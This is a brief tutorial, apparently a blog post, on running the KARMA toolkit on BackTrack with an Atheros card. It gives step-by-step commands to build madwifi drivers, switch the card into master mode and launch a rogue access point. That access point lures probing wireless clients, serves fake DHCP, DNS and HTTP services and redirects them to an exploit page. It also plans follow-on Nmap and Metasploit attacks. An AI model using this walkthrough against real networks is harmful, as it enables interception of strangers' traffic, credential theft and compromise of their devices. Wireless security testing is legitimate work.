THIS WORKS WITH ATHEROS BASED CHIPSET ONLY.
Project homepage: http://theta44.org/karma/index.html
“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -http://theta44.org
first of all install the latest madwifi snapshots here
http://snapshots.madwifi.org/madwifi-trunk/madwifi-trunk-r3813-20080720.tar.gz
bt ~#tar -zxvf madwifi-trunk-r3813-20080720.tar.gz
bt ~#cd madwifi-trunk-r3813-20080720
bt ~#make && make install
bt ~ # ln -s /sbin/iwconfig /usr/sbin/iwconfig
bt ~# ln -s /sbin/iwpriv /usr/sbin/iwpriv
bt ~# ln -s /sbin/iwevent /usr/sbin/iwevent
bt ~# airmon-ng start ath0
bt ~#airmon-ng start wifi0
Putting the card into monitor mode
bt ~#wlanconfig ath0 destroy
bt ~#wlanconfig ath0 create wlandev wifi0 wlanmode master
goto karma directory
karma.xml – “Runs a rogue base station with DHCP, DNS and HTTP services. The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page. This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -http://theta44.org
bt karma#bin/monitor-mode.sh ath0
bt karma#(cd ./src/ && make) && ./src/karma ath0
bt karma#
bt karma#bin/karma etc/karma.xml
Now the rogue services are started any probing clients will now connect to KARMA on our machine whichever SSID their machine chooses to use.
Iwconfig output showing ath0 working as RogueAP.we can see bssid of RogueAP
We can see our FakeAP is working now and broadcasting BSSID & other clients probing for legitimate AP automatically connects with our rogueAP
karma-scan.xml – “Attempts to find insecure wireless clients that will associate to rouge network and possibly obtain IP address via DHCP”. -http://theta44.org
bt karma#bin/karma etc/karma-scan.xml
karma.scan.xml
This tool have layer attack approach.I am still working on it so that we can lauch more attack like Nmap scanning and metasploit for exploit the known vulnerabilites.